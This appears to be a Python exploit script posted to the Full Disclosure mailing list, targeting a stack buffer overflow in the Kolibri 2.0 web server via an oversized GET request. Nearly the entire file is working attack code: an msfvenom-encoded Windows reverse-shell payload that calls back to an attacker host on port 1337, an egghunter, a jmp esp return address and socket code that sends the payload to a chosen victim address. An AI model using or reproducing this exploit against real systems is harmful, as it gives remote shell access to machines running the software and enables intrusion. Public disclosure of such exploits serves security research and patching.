#!/usr/bin/python3
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]
# Date: 2 Augst 2023
# Exploit Author: Mahmoud NourEldin @Engacker
# Vendor App:
https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
# Version: Kolibri 2.0
# Tested on: Windows 10
# Description:
# For the first time making the egghunter jumping to the begging of the
stack
import socket, time, sys, os
if len(sys.argv) != 3:
print(f"[*] Usage: {sys.argv[0]} <Ip Victime> <Port> \n[*] Exploit created
by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt";)
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
try:
#[BadChars] \x00\x0a\x0d\x20\x3d\x3f
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337
EXITFUNC=thread -f py –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"
buf = b"w00tw00t"
buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"
buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"
buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"
buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"
buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"
buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"
buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"
buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"
buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"
buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"
buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"
buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"
buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"
buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"
buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"
buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"
buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"
buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"
buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"
buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"
buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"
buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"
buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"
buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"
buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"
buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"
buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"
buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"
buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"
buf += b"\x68\xbd\xc6"
egghunter =
b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
egghunter +=
b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
egghunter +=
b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
egghunter += b"\xff\xe7"
eip = b"\x42\x24\x01\x10"#0x10012442 jmp esp
'''
payload length is: 800byte
EIP overwritten in 516 place which make a jmp to ESP
ESP include the egghunter and number of CCCC
Egghunter searching for w00tw00t+shellcode which exist in the first
request [buf]
Others just for place
'''
payload = b"\x90"*(515-len(buf))+ buf + eip + egghunter +
(268-len(egghunter)) *b"C"
#The request of the server
request = b""
request += b"GET /"+payload+b" HTTP/1.1\r\n"
request += b"Host: 192.168.56.102:8080\r\n\r\n"
#Connecting to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(f"[*]Sending The Evil Paylod...\nSee your reverse shell")
s.connect((host, port))
s.send(request)
s.close()
print("[x]Done")
#if can't connect
except socket.error:
print("Could not connect!\n[*]Is IP correct? Is Port correct?Can you ping
the machine?")
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
